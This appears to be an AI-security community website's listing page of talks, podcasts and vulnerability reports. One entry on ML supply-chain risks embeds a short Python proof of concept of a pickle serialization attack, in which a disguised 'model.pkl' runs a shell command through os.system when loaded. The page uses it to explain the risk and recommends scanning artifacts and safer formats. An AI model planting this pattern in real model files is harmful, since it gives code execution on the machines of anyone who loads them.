MLSecOps Community
Featured
Securing AI: Red Teaming & Attack Strategies for Machine Learning Systems
Johann Rehberger · 44:13
# AI Security
# AI/ML Red Teaming
# Ethical Hacking
# Pen Testing
# Prompt Injection
# Threat Research

Collections

MLSecOps Connect: Ask the Experts (5 items)
MLSecOps Podcast
Learning Courses
AI Threat Research

Popular topics
# MLSecOps
# AI Security
# Supply Chain Vulnerability
# AI Risk
# Adversarial ML
# Governance, Risk, & Compliance
# Generative AI
# LLM
# Model Provenance
# Trusted AI
# AdvML
# AI/ML Red Teaming
# AI/ML Security Vulnerabilities
# Threat Research
# Model Scanning
# AI Impact
# Large Language Model
# Vulnerability Reporting
# Prompt Injection
# AI Bias
Wednesday, December 11th, 2024 | 11:00 AM Pacific Time
# Model Security
Dr. Cari Miller shares insights from her work with the AI Procurement Lab on the frameworks and strategies needed to mitigate risks in AI acquisitions.
# AI Audit
# AI Bias
# AI Risk
# Cari Miller
# Ethical AI
# Procurement
# Governance, Risk, & Compliance
# Generative AI
# Trusted AI
Join Nicole Nichols of Palo Alto Networks (PANW) on the MLSecOps Podcast as she discusses the present and future of AI security and the growth mindset essential for cybersecurity professionals.
# AI Agents
# AI Security
# Cybersecurity
# Backdoor Attack
# LLM
# Generative AI
This report contains 34 vulnerabilities found by the huntr.com community in open source AI/ML software, including 3 critical and 18 high-severity issues.
# huntr
# Protect AI
# Vulnerability Reporting
# Supply Chain Vulnerability
Protect AI and Hugging Face Partner to Secure the Machine Learning Supply Chain
# Model Scanning
# Model Security
# Supply Chain Vulnerability
Looking to get into AI/ML bug bounty hunting? To help, the team at huntr.com put together a comprehensive guide to get you started.
# AI Security
# AI/ML Red Teaming
# AI/ML Security Vulnerabilities
# Bug Bounty
# huntr
# Supply Chain Vulnerability
Sam Washko & William Armiros · Oct 2nd, 2024
In the fast-moving world of Artificial Intelligence (AI) and Machine Learning (ML), ensuring model and data integrity is a must. Sam Washko and Will Armiros (Senior Software Engineers, Protect AI) joined our MLSecOps Community Meetup on September 10, 2024 to talk about ML supply chain vulnerabilities and defenses. Some of their key insights on model serialization attacks, data poisoning, and the bleeding-edge tools developed to keep your AI safe are included below; an illustrative sketch of a serialization attack follows the tag list.
# MLSecOps
# Adversarial ML
# AI Security
# Data Poisoning
# Model Security
# Supply Chain Vulnerability
# Threat Research
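To make the serialization risk mentioned above concrete, here is a minimal, hypothetical sketch (not taken from the talk) of a pickle-based model serialization attack: a crafted "model file" executes attacker-controlled code the moment it is deserialized. The file name and payload command are illustrative assumptions.

```python
# Hypothetical illustration of a pickle-based model serialization attack.
# Unpickling the crafted "model" runs attacker-controlled code.
import os
import pickle


class MaliciousModel:
    """Pickles into a payload that executes a command on load."""

    def __reduce__(self):
        # On unpickling, Python calls os.system(...) instead of
        # reconstructing a legitimate model object.
        return (os.system, ("echo 'code executed during model load'",))


# An attacker ships this file as if it were a trained model artifact.
with open("model.pkl", "wb") as f:
    pickle.dump(MaliciousModel(), f)

# The victim "loads the model" -- the embedded command runs here.
with open("model.pkl", "rb") as f:
    pickle.load(f)
```

This is one reason teams scan model artifacts before loading them and favor serialization formats, such as safetensors, that cannot embed executable code.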
Caleb Sima joins us to discuss security considerations for building and using AI, drawing on his 25+ years of cybersecurity experience. (22:59)
# AI Agents
# AI Risk
# AI Security
# AI-BOM
# AI/ML Security Vulnerabilities
# ChatGPT
# Generative AI
# LLM
# Model Provenance
# Retrieval-Augmented Generation
# Supply Chain Vulnerability
This report contains 20 vulnerabilities found by the huntr.com community in open source AI/ML software.
# huntr
# Protect AI
# Vulnerability Reporting
# Supply Chain Vulnerability
Popular
Securing AI/ML with Ian Swanson
Ian Swanson